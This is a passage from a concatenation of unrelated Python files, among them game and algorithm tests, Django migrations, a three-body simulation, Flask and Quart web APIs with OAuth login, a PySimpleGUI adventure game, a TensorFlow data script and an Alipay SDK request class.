        # (Hill Fort leaves, Silver enters), one action consumed.
        self.plr.test_input = ["put it", "Get Silver"]
        hndsz = self.plr.piles[Piles.HAND].size()
        acts = self.plr.actions.get()
        self.plr.play_card(self.card)
        self.assertIn("Silver", self.plr.piles[Piles.HAND])
        self.assertEqual(self.plr.piles[Piles.HAND].size(), hndsz)
        self.assertEqual(self.plr.actions.get(), acts - 1)

    def test_play_disc(self):
        # +1 Card / +1 Action mode: Silver does not reach the hand; the drawn
        # card and extra action offset playing Hill Fort.
        self.plr.test_input = ["card", "Get Silver"]
        hndsz = self.plr.piles[Piles.HAND].size()
        acts = self.plr.actions.get()
        self.plr.play_card(self.card)
        self.assertNotIn("Silver", self.plr.piles[Piles.HAND])
        self.assertEqual(self.plr.piles[Piles.HAND].size(), hndsz + 1 - 1)
        self.assertEqual(self.plr.actions.get(), acts - 1 + 1)
###############################################################################
if __name__ == "__main__": # pragma: no cover
unittest.main()
# EOF
|
from AlgoExpert import allkindsofnodedepths as program
import unittest
class TestProgram(unittest.TestCase):
    """Checks allKindsOfNodeDepths on a 9-node binary tree."""

    def test_case_1(self):
        # Tree shape: 1 -> (2 -> (4 -> (8, 9), 5), 3 -> (6, 7)).
        root = program.BinaryTree(1)
        root.left = program.BinaryTree(2)
        root.left.left = program.BinaryTree(4)
        root.left.left.left = program.BinaryTree(8)
        root.left.left.right = program.BinaryTree(9)
        root.left.right = program.BinaryTree(5)
        root.right = program.BinaryTree(3)
        root.right.left = program.BinaryTree(6)
        root.right.right = program.BinaryTree(7)
        actual = program.allKindsOfNodeDepths(root)
        # Expected total for this fixture per the AlgoExpert problem spec.
        self.assertEqual(actual, 26)
|
# Generated by Django 3.0.5 on 2020-04-16 09:04
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add Product.quantity (integer, default 1)."""

    dependencies = [
        ('stores', '0012_auto_20200416_1414'),
    ]
    operations = [
        migrations.AddField(
            model_name='product',
            name='quantity',
            field=models.IntegerField(default=1),
        ),
    ]
|
import numpy as np
from scipy.integrate import ode
import matplotlib.pyplot as plt
def f(t, p, m):
    """ODE right-hand side for the planar three-body problem.

    State p = [x0, y0, x1, y1, x2, y2, vx0, vy0, vx1, vy1, vx2, vy2]:
    positions of the three bodies followed by their velocities; m holds the
    three masses. Returns dp/dt: the velocities, then the accelerations from
    pairwise inverse-square attraction (each component via fac3, with the
    coordinates swapped to produce the x- and y-components).
    """
    return [
        p[6],
        p[7],
        p[8],
        p[9],
        p[10],
        p[11],
        -fac3(p[0], p[1], p[2], p[3], p[4], p[5], m[1], m[2]),
        -fac3(p[1], p[0], p[3], p[2], p[5], p[4], m[1], m[2]),
        -fac3(p[2], p[3], p[4], p[5], p[0], p[1], m[2], m[0]),
        -fac3(p[3], p[2], p[5], p[4], p[1], p[0], m[2], m[0]),
        -fac3(p[4], p[5], p[0], p[1], p[2], p[3], m[0], m[1]),
        -fac3(p[5], p[4], p[1], p[0], p[3], p[2], m[0], m[1])
    ]
def fac3(p00, p01, p10, p11, p20, p21, m1, m2):
    """Sum of the two mass-weighted pairwise interaction terms acting on the
    body at (p00, p01) from the bodies at (p10, p11) and (p20, p21)."""
    return m1 * fac2(p00, p01, p10, p11) + m2 * fac2(p00, p01, p20, p21)
def fac2(p00, p01, p10, p11):
    """One coordinate of the inverse-square interaction: dx / |r|^3 for the
    separation vector r between the two points."""
    dx = p00 - p10
    dy = p01 - p11
    dist_sq = dx ** 2.0 + dy ** 2.0
    return dx / np.power(dist_sq, 1.5)
def main():
    """Integrate a three-body configuration for 70 time units and plot it."""
    # Initial state: (x, y) positions of the three bodies, then velocities.
    p0 = [
        3.0, 4.0,
        0.0, 0.0,
        3.0, 0.0,
        0.0, 0.0,
        0.0, 0.0,
        0.0, 0.0
    ]
    t0 = 0.0
    t1 = 70.0
    dt = 0.0001  # sampling step handed to the integrator
    # Masses of the three bodies.
    m = [
        3.0,
        4.0,
        5.0
    ]
    p = integrate(f, p0, t0, t1, dt, m)
    plot_p(p, 'figure.png')
def integrate(f, p0, t0, t1, dt, m):
    """Integrate f from t0 to t1 with dopri5, sampling every dt.

    Returns an array of shape (n_steps, len(p0)) holding the state after
    each sampled step.
    """
    solver = ode(f)
    solver.set_integrator('dopri5')
    solver.set_initial_value(p0, t0)
    solver.set_f_params(m)
    samples = []
    while solver.successful() and solver.t < t1:
        samples.append(solver.integrate(solver.t + dt))
    return np.array(samples)
def plot_p(p, filename):
    """Plot the three position trajectories and save the figure to filename."""
    # NOTE(review): the 'seaborn' style name was removed in matplotlib 3.6+
    # (renamed 'seaborn-v0_8') — confirm the pinned matplotlib version.
    plt.style.use('seaborn')
    fig, ax = plt.subplots()
    ax.set_title('Three-Body Problem')
    ax.set_xlabel('x')
    ax.set_ylabel('y')
    ax.axis('equal')
    ax.grid(True)
    ax.axhline(0.0, color='gray')
    ax.axvline(0.0, color='gray')
    ax.set_xlim(-4.0, 8.0)
    ax.set_ylim(-6.0, 6.0)
    # Reshape flat rows into (steps, pos/vel, body, x/y); index 0 = positions.
    view = np.reshape(p, (p.shape[0], 2, 3, 2))
    ax.plot(view[:, 0, 0, 0], view[:, 0, 0, 1])
    ax.plot(view[:, 0, 1, 0], view[:, 0, 1, 1])
    ax.plot(view[:, 0, 2, 0], view[:, 0, 2, 1])
    plt.savefig(filename)
if __name__ == '__main__':
main()
|
from .. import yshoog
from datetime import datetime
from flask import render_template, session, redirect, url_for,request, jsonify
from ....models import ToolCategory,Tool
from ....utils import utils
from app import db
# List all tool categories
@yshoog.route('/toolcategory/all',methods = ['GET','POST'])
def getAll():
    """Return every ToolCategory as a JSON list."""
    try:
        categorys = ToolCategory.query.all()
    except Exception:  # narrowed from a bare except (also caught SystemExit etc.)
        return utils.network.Network.responseCode(utils.network.HttpVailateError, None, '服务端出现异常')
    else:
        categorylist = [category.as_dict() for category in categorys]
        return utils.network.Network.responseCode(utils.network.HttpSuccess,{'list':categorylist},'查询成功')
# Add a tool category
@yshoog.route('/toolcategory/add',methods = ['POST'])
def addCategory():
    """Create a new ToolCategory; name must be present, non-null and unique."""
    # Removed the leftover `print(request.json)` debug line, which logged
    # every request body to stdout.
    if 'categoryname' not in request.json :
        return utils.network.Network.responseCode(utils.network.HttpParamsError, None, '参数错误')
    if request.json['categoryname'] is None:
        return utils.network.Network.responseCode(utils.network.HttpParamsError, None, '名称不能为空')
    oldcategory = ToolCategory.query.filter_by(categoryname=request.json['categoryname']).first()
    if oldcategory is not None:
        return utils.network.Network.responseCode(utils.network.HttpVailateError, None, '该分类已存在,请更换名称!')
    category = ToolCategory(categoryname=request.json['categoryname'],color=request.json['color'])
    db.session.add(category)
    db.session.commit()
    return utils.network.Network.responseCode(utils.network.HttpSuccess, {'category':category.as_dict()}, '添加成功')
# Update a tool category
@yshoog.route('/toolcategory/update', methods=['POST'])
def updateCategory():
    """Rename/recolour the ToolCategory identified by id."""
    if 'id' not in request.json :
        return utils.network.Network.responseCode(utils.network.HttpParamsError, None, '参数错误')
    if request.json['categoryname'] is None:
        return utils.network.Network.responseCode(utils.network.HttpParamsError, None, '名称不能为空')
    # BUG fix: the lookup previously filtered `categoryname` by the id value
    # (filter_by(categoryname=request.json['id'])), so the record was never
    # found; filter on the primary key instead, as delCategory does.
    oldcategory = ToolCategory.query.filter_by(id=request.json['id']).first()
    if oldcategory is None:
        return utils.network.Network.responseCode(utils.network.HttpVailateError,None,'该分类不存在,请检查数据正确性!')
    oldcategory.categoryname = request.json['categoryname']
    oldcategory.color = request.json['color']
    db.session.commit()
    # Return a structured success payload instead of the previous empty
    # string, matching every other endpoint in this module.
    return utils.network.Network.responseCode(utils.network.HttpSuccess, {'category':oldcategory.as_dict()}, '修改成功')
# Delete a tool category
@yshoog.route('/toolcategory/del',methods = ['POST'])
def delCategory():
    """Delete the ToolCategory with the given id; error response if absent."""
    if 'id' not in request.json :
        return utils.network.Network.responseCode(utils.network.HttpParamsError, None, '参数错误')
    oldcategory = ToolCategory.query.filter_by(id=request.json['id']).first()
    if oldcategory is None:
        return utils.network.Network.responseCode(utils.network.HttpVailateError,None,'该分类不存在,请检查数据正确性!')
    db.session.delete(oldcategory)
    db.session.commit()
    return utils.network.Network.responseCode(utils.network.HttpSuccess, None, '删除成功')
# Add a tool
@yshoog.route('/tools/add',methods = ['POST'])
def addTool():
    """Create a new Tool; name must be present, non-null and unique."""
    if 'name' not in request.json :
        return utils.network.Network.responseCode(utils.network.HttpParamsError, None, '参数错误')
    if request.json['name'] is None:
        return utils.network.Network.responseCode(utils.network.HttpParamsError, None, '名称不能为空')
    oldTool = Tool.query.filter_by(name=request.json['name']).first()
    if oldTool is not None:
        return utils.network.Network.responseCode(utils.network.HttpVailateError, None, '该工具已存在,请重新添加')
    tool = Tool(name=request.json['name'],icon=request.json['icon'],href=request.json['href'],categoryid=request.json['categoryid'],subtitle= request.json['subtitle'])
    db.session.add(tool)
    db.session.commit()
    return utils.network.Network.responseCode(utils.network.HttpSuccess, {'tool':tool.as_dict()}, '添加成功')
# List all tools (the original comment was a copy-paste of the category one)
@yshoog.route('/tools/all',methods = ['GET','POST'])
def getToolAll():
    """Return every Tool as a JSON list."""
    try:
        tools = Tool.query.all()
    except Exception:  # narrowed from a bare except (also caught SystemExit etc.)
        return utils.network.Network.responseCode(utils.network.HttpVailateError, None, '服务端出现异常')
    else:
        # Loop variable renamed from the misleading `category` to `tool`.
        toollist = [tool.as_dict() for tool in tools]
        return utils.network.Network.responseCode(utils.network.HttpSuccess,{'list':toollist},'查询成功')
# Generated by Django 3.1.2 on 2020-11-12 03:35
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add ArticleParagraph.carousel_name (auto-generated by Django 3.1.2)."""

    dependencies = [
        ('article', '0004_paragraphimage_leading'),
    ]

    operations = [
        migrations.AddField(
            model_name='articleparagraph',
            name='carousel_name',
            # NOTE: max_length on a TextField is not enforced at the database
            # level by Django; kept exactly as generated.
            field=models.TextField(default='carousel-default', max_length=30),
        ),
    ]
|
# Start the adventure at the forest — the player can go left to the mountain or right to the castle.
# Plan: store the player's choice in a variable,
# branch with if/elif on each possible choice,
# and print the final outcome for every path.
import PySimpleGUI as sg
"""
Adventure Game - open and closing windows simultaneously.
Text scroll adventure game
Click "choices" buttons which will open a new window and progress the story.
Window 1 launches (depending on choices) window 2 & 3
Window 2 choices open up 4 & 5
Window 3 choices opens 6 & 7
"""
# functions that contain text/story and buttons for options to the next window
def make_win1():
    """Build the opening window: forest intro with Left/Right/End choices."""
    rows = [
        [sg.Text('You start your adventure in the forest.\nYou need to get home and it will be dark soon,\ndo you go left to the mountain pass or right to the castle?'), sg.Text(' ', k='-OUTPUT-')],
        [sg.Button('Left'), sg.Button('Right'), sg.Button('End')],
    ]
    return sg.Window('Window Title', rows, finalize=True)
def make_win2():
    """Mountain-pass window with Path/Track/End choices."""
    rows = [
        [sg.Text('You end up at the mountian pass. Do you take the path or the off beaten track?')],
        [sg.Button('Path'), sg.Button('Track'), sg.Button('End')],
    ]
    return sg.Window('Second Window', rows, finalize=True)
def make_win3():
    """Castle window with Go/Stay/End choices."""
    rows = [
        [sg.Text('Arriving at the castle you are greeted warmly by some friends.\nDo you spend the night or say you must be on your way home?')],
        [sg.Button('Go'), sg.Button('Stay'), sg.Button('End')],
    ]
    return sg.Window('Second Window', rows, finalize=True)
def make_win4():
    """Good mountain ending: the player makes it home for dinner."""
    rows = [
        [sg.Text('You feel tired after the long trek but you make it home just in time for dinner.')],
        [sg.Button('End')],
    ]
    return sg.Window('Second Window', rows, finalize=True)
def make_win5():
    """Bad mountain ending: the player falls to their death."""
    rows = [
        [sg.Text('You end up falling off the mountain to your death.')],
        [sg.Button('End')],
    ]
    return sg.Window('Second Window', rows, finalize=True)
def make_win6():
    """Bad castle ending: the player gets lost in the dark."""
    rows = [
        [sg.Text('You get lost on your way and with it getting dark you fear you will never make it home.')],
        [sg.Button('End')],
    ]
    return sg.Window('Second Window', rows, finalize=True)
def make_win7():
    """Good castle ending: the player stays and rides home in the morning."""
    rows = [
        [sg.Text('You spend a joyous night with your friends. In the morning they offer to give a ride in the carriage home.')],
        [sg.Button('End')],
    ]
    return sg.Window('Second Window', rows, finalize=True)
def event_loop():
    """Drive the GUI adventure: open/close windows as the player clicks choices."""
    window1, window2 = make_win1(), None  # start off with only window 1 open
    window3 = None
    window4 = None
    while True:  # The Event Loop
        # Blocks until any currently-open window produces an event.
        window, event, values = sg.read_all_windows()
        if event == sg.WIN_CLOSED or event == 'End':
            window.close()
            if window == window2:  # if closing win 2, mark as closed
                window2 = None
            elif window == window1:  # if closing win 1, exit program
                break
        # elif events that makes the previous windows close upon selecting a
        # button from the listed functions above.
        # NOTE(review): `window = window.close()` / `window2 = window.close()`
        # appear to rely on close() returning None to also null the reference —
        # confirm against the PySimpleGUI API.
        elif event == 'Left' and not window2:
            window2 = make_win2()
            window = window.close()
        elif event == 'Right' and not window2:
            window2 = make_win3()
            window = window.close()
        elif event == 'Path' and not window3:
            window3 = make_win4()
            window2 = window.close()
        elif event == 'Track' and not window3:
            window3 = make_win5()
            window2 = window.close()
        elif event == 'Go' and not window4:
            window4 = make_win6()
            window2 = window.close()
        elif event == 'Stay' and not window4:
            window4 = make_win7()
            window2 = window.close()
    window.close()  # close whichever window was active when the loop exited
# original story Non- GUI code below
def story():
    """Console version of the adventure (pre-GUI original, kept for reference)."""
    first = input('You start your adventure in the forest. You need to get home and it will be dark soon, do you go left to the mountain pass or right to the castle? \n Choose Left or Right')
    if first == 'Left':
        second = input('You end up at the mountian pass. Do you take the path or the off beaten track? \n Path / Track')
        if second == 'Track':
            print('You end up falling off the mountain to your death.')
        elif second == 'Path':
            print('You feel tired after the long trek but you make it home just in time for dinner.')
    elif first == 'Right':
        third = input('Arriving at the castle you are greeted warmly by some friends. Do you spend the night or say you must be on your way home? \n Stay / Go')
        if third == 'Go':
            print('You get lost on your way and with it getting dark you fear you will never make it home.')
        elif third == 'Stay':
            print('You spend a joyous night with your friends. In the morning they offer to give a ride in the carriage home.')
if __name__ == "__main__":
    # story()      # console version, kept for manual testing
    # make_win1()  # individual window smoke tests
    # make_win2()
    event_loop()
#-------------------------------------------------------------------------------
# Name: 265
# Purpose:
#
# Author: wrongrook
#
def e265_recurse(S, last, N):
    """Depth-first search over binary-circle extensions (Project Euler 265).

    S is the set of N-bit window values already used, `last` the current
    accumulated bit string as an integer.  Returns the sum of the final
    `last` values over every complete arrangement reachable from here.
    S is restored to its input contents before returning.
    """
    if len(S) == N:
        return last
    shifted = last * 2
    total = 0
    # Try appending a 0 bit, then a 1 bit.  N is a power of two, so
    # `& (N - 1)` keeps only the low log2(N) bits of the sliding window.
    for bit in (0, 1):
        window = (shifted + bit) & (N - 1)
        if window not in S:
            S.add(window)
            total += e265_recurse(S, shifted + bit, N)
            S.remove(window)
    return total
n = 5
# Run the search for 2**n-bit circles; the division by 2**(n-1) appears to
# remove symmetric duplicates counted by the recursion — TODO confirm.
# NOTE(review): `/` yields a float on Python 3; `//` would keep it integral.
print (e265_recurse(set([0]),0,2**n)/2**(n-1))
import os
import aiohttp
from quart import Quart, abort, jsonify, request, session, redirect, url_for, render_template
from quart_discord import DiscordOAuth2Session, requires_authorization, Unauthorized, AccessDenied
from urllib.parse import quote
from alttprbot.tournaments import TOURNAMENT_DATA, fetch_tournament_handler
from alttprbot.tournament.core import UnableToLookupEpisodeException
from alttprbot.alttprgen.mystery import get_weights, generate
from alttprbot.database import league_playoffs, srlnick
from alttprbot_discord.bot import discordbot
# Quart application serving the SahasrahBot web API and OAuth flows.
sahasrahbotapi = Quart(__name__)
# Session-cookie signing key; APP_SECRET_KEY must be set (bytes() would raise on None).
sahasrahbotapi.secret_key = bytes(os.environ.get("APP_SECRET_KEY"), "utf-8")
# racetime.gg OAuth client credentials and endpoints.
RACETIME_CLIENT_ID_OAUTH = os.environ.get('RACETIME_CLIENT_ID_OAUTH')
RACETIME_CLIENT_SECRET_OAUTH = os.environ.get('RACETIME_CLIENT_SECRET_OAUTH')
RACETIME_URL = os.environ.get('RACETIME_URL', 'https://racetime.gg')
APP_URL = os.environ.get('APP_URL', 'https://sahasrahbotapi.synack.live')
# Discord OAuth settings consumed by quart_discord.
sahasrahbotapi.config["DISCORD_CLIENT_ID"] = int(os.environ.get("DISCORD_CLIENT_ID"))
sahasrahbotapi.config["DISCORD_CLIENT_SECRET"] = os.environ.get("DISCORD_CLIENT_SECRET")
sahasrahbotapi.config["DISCORD_REDIRECT_URI"] = os.environ.get("APP_URL") + "/callback/discord/"
sahasrahbotapi.config["DISCORD_BOT_TOKEN"] = os.environ.get("DISCORD_TOKEN")
discord = DiscordOAuth2Session(sahasrahbotapi)
@sahasrahbotapi.route("/login/")
async def login():
    """Start the Discord OAuth2 flow; after auth, return to the saved path."""
    return await discord.create_session(
        scope=[
            'identify',
        ],
        # login_original_path is stored by redirect_unauthorized() so the
        # user lands back where they started; defaults to /me.
        data=dict(redirect=session.get("login_original_path", "/me"))
    )
@sahasrahbotapi.route("/callback/discord/")
async def callback():
    """Complete the Discord OAuth2 handshake, then redirect to the saved path."""
    data = await discord.callback()
    redirect_to = data.get("redirect", "/me/")
    return redirect(redirect_to)
@sahasrahbotapi.errorhandler(Unauthorized)
async def redirect_unauthorized(e):
    """On an unauthenticated request, remember the path and send to /login/."""
    session['login_original_path'] = request.full_path
    return redirect(url_for("login"))
@sahasrahbotapi.errorhandler(AccessDenied)
async def access_denied(e):
    """Shown when the user declines the Discord OAuth consent screen."""
    return await render_template(
        'error.html',
        title="Access Denied",
        message="We were unable to access your Discord account."
    )
@sahasrahbotapi.errorhandler(UnableToLookupEpisodeException)
async def unable_to_lookup(e):
    """Friendly error page for an unknown SpeedGaming episode ID."""
    return await render_template(
        'error.html',
        title="SpeedGaming Episode Not Found",
        message="The SpeedGaming Episode ID was not found. Please double check!"
    )
@sahasrahbotapi.route("/me/")
@requires_authorization
async def me():
    """Show the logged-in user's profile page."""
    user = await discord.fetch_user()
    return await render_template('me.html', logged_in=True, user=user)
@sahasrahbotapi.route("/logout/")
async def logout():
    """Drop the stored Discord OAuth tokens and show the logout page."""
    discord.revoke()
    return await render_template('logout.html', logged_in=False)
@sahasrahbotapi.route('/api/settingsgen/mystery', methods=['POST'])
async def mysterygen():
    """Generate mystery-seed settings from weights supplied in the POST body.

    The response includes which randomizer API endpoint the client should
    call next; it is None for door seeds (no endpoint selected for those).
    """
    weights = await request.get_json()
    mystery = await generate(weights=weights, spoilers="mystery")
    if mystery.customizer:
        endpoint = '/api/customizer'
    elif mystery.doors:
        endpoint = None
    else:
        endpoint = '/api/randomizer'
    # NOTE(review): leftover debug print to stdout; this handler also
    # duplicates the body of mysterygenwithweights().
    print(mystery.custom_instructions)
    return jsonify(
        settings=mystery.settings,
        customizer=mystery.customizer,
        doors=mystery.doors,
        endpoint=endpoint
    )
@sahasrahbotapi.route('/api/settingsgen/mystery/<string:weightset>', methods=['GET'])
async def mysterygenwithweights(weightset):
    """Generate mystery-seed settings from a named, stored weightset.

    Response shape matches the POST variant: settings plus the endpoint to
    call next (None for door seeds).
    """
    weights = await get_weights(weightset)
    mystery = await generate(weights=weights, spoilers="mystery")
    if mystery.customizer:
        endpoint = '/api/customizer'
    elif mystery.doors:
        endpoint = None
    else:
        endpoint = '/api/randomizer'
    # NOTE(review): leftover debug print to stdout.
    print(mystery.custom_instructions)
    return jsonify(
        settings=mystery.settings,
        customizer=mystery.customizer,
        doors=mystery.doors,
        endpoint=endpoint
    )
@sahasrahbotapi.route("/submit/<string:event>", methods=['GET'])
@requires_authorization
async def submission_form(event):
    """Render the settings-submission form for a tournament event."""
    user = await discord.fetch_user()
    episode_id = request.args.get("episode_id", "")
    event_config = await TOURNAMENT_DATA[event].get_config()
    form_data = event_config.submission_form
    if form_data is None:
        # NOTE(review): a plain Exception surfaces as a 500; a 404 might be friendlier.
        raise Exception("There is no form submission data for this event.")
    return await render_template(
        'submission.html',
        logged_in=True,
        user=user,
        event=event,
        # The form POSTs to the submit() handler below.
        endpoint=url_for("submit"),
        settings_list=form_data,
        episode_id=episode_id
    )
@sahasrahbotapi.route("/submit", methods=['POST'])
@requires_authorization
async def submit():
    """Accept the POSTed submission form and hand it to the tournament handler."""
    user = await discord.fetch_user()
    payload = await request.form
    tournament_race = await fetch_tournament_handler(payload['event'], int(payload['episodeid']))
    # Record who submitted, in Discord name#discriminator form.
    await tournament_race.process_submission_form(payload, submitted_by=f"{user.name}#{user.discriminator}")
    return await render_template(
        "submission_done.html",
        logged_in=True,
        user=user,
        tournament_race=tournament_race
    )
@sahasrahbotapi.route('/api/league/playoff/<int:episode_id>', methods=['GET'])
async def get_league_playoff(episode_id):
    """Return the submitted league playoff record for one episode as JSON."""
    playoff = await league_playoffs.get_playoff_by_episodeid_submitted(episode_id)
    return jsonify(playoff)
@sahasrahbotapi.route('/api/league/playoffs', methods=['GET'])
async def get_league_playoffs():
    """Return every league playoff record as JSON."""
    playoffs = await league_playoffs.get_all_playoffs()
    return jsonify(playoffs)
@sahasrahbotapi.route('/racetime/verification/initiate', methods=['GET'])
@requires_authorization
async def racetime_init_verification():
    """Kick off the racetime.gg OAuth2 authorization-code flow."""
    # The redirect URI must be URL-encoded when embedded in the query string.
    redirect_uri = quote(f"{APP_URL}/racetime/verify/return")
    return redirect(
        f"{RACETIME_URL}/o/authorize?client_id={RACETIME_CLIENT_ID_OAUTH}&response_type=code&scope=read&redirect_uri={redirect_uri}",
    )
@sahasrahbotapi.route('/racetime/verify/return', methods=['GET'])
@requires_authorization
async def return_racetime_verify():
    """OAuth2 redirect target: exchange the code, fetch the racetime user, link it."""
    user = await discord.fetch_user()
    code = request.args.get("code")
    if code is None:
        return abort(400, "code is missing")
    # Exchange the authorization code for an access token.
    data = {
        'client_id': RACETIME_CLIENT_ID_OAUTH,
        'client_secret': RACETIME_CLIENT_SECRET_OAUTH,
        'code': code,
        'grant_type': 'authorization_code',
        'scope': 'read',
        'redirect_uri': f"{APP_URL}/racetime/verify/return"
    }
    async with aiohttp.request(url=f"{RACETIME_URL}/o/token", method="post", data=data, raise_for_status=True) as resp:
        token_data = await resp.json()
    token = token_data['access_token']
    headers = {
        'Authorization': f'Bearer {token}'
    }
    # Look up the racetime.gg account the token belongs to.
    async with aiohttp.request(url=f"{RACETIME_URL}/o/userinfo", method="get", headers=headers, raise_for_status=True) as resp:
        userinfo_data = await resp.json()
    # Persist the Discord-user -> racetime-id mapping.
    await srlnick.insert_rtgg_id(user.id, userinfo_data['id'])
    return await render_template('racetime_verified.html', logged_in=True, user=user, racetime_name=userinfo_data['name'])
@sahasrahbotapi.route('/healthcheck', methods=['GET'])
async def healthcheck():
    """Liveness probe: verify the bot's Discord gateway connection and API access."""
    if discordbot.is_closed():
        abort(500, description='Connection to Discord is closed.')
    appinfo = await discordbot.application_info()
    # Round-trip a REST call to prove the bot token still works.
    await discordbot.fetch_user(appinfo.owner.id)
    return jsonify(
        success=True
    )
@sahasrahbotapi.route('/robots.txt', methods=['GET'])
async def robots():
    """Serve a robots.txt that disallows all crawlers."""
    lines = ('User-agent: *', 'Disallow: /', '')
    return '\n'.join(lines)
# @sahasrahbotapi.errorhandler(400)
# def bad_request(e):
# return jsonify(success=False, error=repr(e))
# @sahasrahbotapi.errorhandler(404)
# def not_found(e):
# return jsonify(success=False, error=repr(e))
# @sahasrahbotapi.errorhandler(500)
# def something_bad_happened(e):
# return jsonify(success=False, error=repr(e))
|
# import train_helper
# import time
# import os
import helper
# import sys
# import eval_helper
import numpy as np
import tensorflow as tf
import read_cityscapes_tf_records as reader
# Command-line flag: path to the experiment configuration module.
tf.app.flags.DEFINE_string('config_path', "config/cityscapes.py",
                           """Path to experiment config.""")
FLAGS = tf.app.flags.FLAGS
# Import the config so its settings are registered before main() runs.
helper.import_module('config', FLAGS.config_path)
# Debug: list the registered flag names (TF1-internal __flags dict).
print(FLAGS.__dict__['__flags'].keys())
def main(argv=None):
    """Read one Cityscapes training batch and print per-class pixel statistics."""
    train_data, train_labels, train_names, train_weights = reader.inputs(
        shuffle=True, num_epochs=1, dataset_partition='train')
    session = tf.Session()
    # num_epochs-based input pipelines keep their counters in local variables.
    session.run(tf.initialize_local_variables())
    coord = tf.train.Coordinator()
    threads = tf.train.start_queue_runners(session=session, coord=coord)
    for i in range(1):  # WAS a larger range; trimmed to a single batch
        print(i)
        labels, weights = session.run([train_labels, train_weights])
        # Pixels labeled 255 — presumably the Cityscapes "ignore" label;
        # currently unused. TODO confirm or remove.
        l255 = labels[0, labels[0] == 255]
        result_sum = 0
        # Iterate the 19 Cityscapes evaluation classes.
        for j in range(19):
            print('Label {}'.format(j))
            lj = labels[0, labels[0] == j]
            wj = weights[0, labels[0] == j]
            # Fraction of the first example's pixels carrying class j.
            amount = len(lj) / (len(labels[0]))
            print(amount)
            if len(wj) > 0:
                print('Weight ', wj[0])
                d = wj[0] * amount
            else:
                d = 0
            result_sum += d
        print(result_sum)
    coord.request_stop()
    coord.join(threads)
    session.close()
if __name__ == '__main__':
    tf.app.run()
|
# 给定一个由整数组成的非空数组所表示的非负整数,在该数的基础上加一。
#
# 最高位数字存放在数组的首位, 数组中每个元素只存储单个数字。
#
# 你可以假设除了整数 0 之外,这个整数不会以零开头。
#
# 示例 1:
#
# 输入: [1,2,3]
# 输出: [1,2,4]
# 解释: 输入数组表示数字 123。
#
#
# 示例 2:
#
# 输入: [4,3,2,1]
# 输出: [4,3,2,2]
# 解释: 输入数组表示数字 4321。
#
# Related Topics 数组
# leetcode submit region begin(Prohibit modification and deletion)
from typing import List
class Solution:
    """LeetCode 66: add one to a number stored as a digit array."""

    def plusOne(self, digits: List[int]) -> List[int]:
        """Return `digits` incremented by one (most-significant digit first).

        The list is modified in place and returned; an all-nines input
        (e.g. [9, 9]) grows by one digit, and an empty input yields [1].
        """
        if not digits:
            return [1]
        for idx in reversed(range(len(digits))):
            if digits[idx] == 9:
                # 9 + 1 carries: this position becomes 0, keep walking left.
                digits[idx] = 0
            else:
                digits[idx] += 1
                return digits
        # Every digit was 9 (999 -> 1000): prepend the final carry.
        digits.insert(0, 1)
        return digits
# leetcode submit region end(Prohibit modification and deletion)
if __name__ == '__main__':
    # Smoke test: [9] + 1 -> [1, 0].
    digist = [9]
    solution = Solution()
    print(solution.plusOne(digist))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
class ZhimaCreditEpCodecCreateRequest(object):
    """Request object for the Alipay `zhima.credit.ep.codec.create` API.

    Generated-SDK style: plain properties for each request field plus
    `get_params()` / `get_multipart_params()` used by the API client to
    build the outgoing call.
    """

    def __init__(self, biz_model=None):
        self._biz_model = biz_model
        # Business fields for this API.
        self._channel_id = None
        self._channel_name = None
        self._goto_url = None
        self._subtitle = None
        self._title = None
        # File-upload fields (must be FileItem instances).
        self._content_img = None
        self._logo_img = None
        # Common request plumbing shared by all Alipay requests.
        self._version = "1.0"
        self._terminal_type = None
        self._terminal_info = None
        self._prod_code = None
        self._notify_url = None
        self._return_url = None
        self._udf_params = None
        self._need_encrypt = False

    @property
    def biz_model(self):
        return self._biz_model

    @biz_model.setter
    def biz_model(self, value):
        self._biz_model = value

    @property
    def channel_id(self):
        return self._channel_id

    @channel_id.setter
    def channel_id(self, value):
        self._channel_id = value

    @property
    def channel_name(self):
        return self._channel_name

    @channel_name.setter
    def channel_name(self, value):
        self._channel_name = value

    @property
    def goto_url(self):
        return self._goto_url

    @goto_url.setter
    def goto_url(self, value):
        self._goto_url = value

    @property
    def subtitle(self):
        return self._subtitle

    @subtitle.setter
    def subtitle(self, value):
        self._subtitle = value

    @property
    def title(self):
        return self._title

    @title.setter
    def title(self, value):
        self._title = value

    @property
    def content_img(self):
        return self._content_img

    @content_img.setter
    def content_img(self, value):
        # Silently ignores anything that is not a FileItem.
        if not isinstance(value, FileItem):
            return
        self._content_img = value

    @property
    def logo_img(self):
        return self._logo_img

    @logo_img.setter
    def logo_img(self, value):
        # Silently ignores anything that is not a FileItem.
        if not isinstance(value, FileItem):
            return
        self._logo_img = value

    @property
    def version(self):
        return self._version

    @version.setter
    def version(self, value):
        self._version = value

    @property
    def terminal_type(self):
        return self._terminal_type

    @terminal_type.setter
    def terminal_type(self, value):
        self._terminal_type = value

    @property
    def terminal_info(self):
        return self._terminal_info

    @terminal_info.setter
    def terminal_info(self, value):
        self._terminal_info = value

    @property
    def prod_code(self):
        return self._prod_code

    @prod_code.setter
    def prod_code(self, value):
        self._prod_code = value

    @property
    def notify_url(self):
        return self._notify_url

    @notify_url.setter
    def notify_url(self, value):
        self._notify_url = value

    @property
    def return_url(self):
        return self._return_url

    @return_url.setter
    def return_url(self, value):
        self._return_url = value

    @property
    def udf_params(self):
        return self._udf_params

    @udf_params.setter
    def udf_params(self, value):
        # Silently ignores anything that is not a dict.
        if not isinstance(value, dict):
            return
        self._udf_params = value

    @property
    def need_encrypt(self):
        return self._need_encrypt

    @need_encrypt.setter
    def need_encrypt(self, value):
        self._need_encrypt = value

    def add_other_text_param(self, key, value):
        """Add a single user-defined text parameter to the request."""
        if not self.udf_params:
            self.udf_params = dict()
        self.udf_params[key] = value

    def get_params(self):
        """Build the flat dict of text parameters for the API call.

        Objects exposing to_alipay_dict() are JSON-serialized; falsy fields
        are omitted.
        """
        params = dict()
        params[P_METHOD] = 'zhima.credit.ep.codec.create'
        params[P_VERSION] = self.version
        if self.biz_model:
            params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
        if self.channel_id:
            if hasattr(self.channel_id, 'to_alipay_dict'):
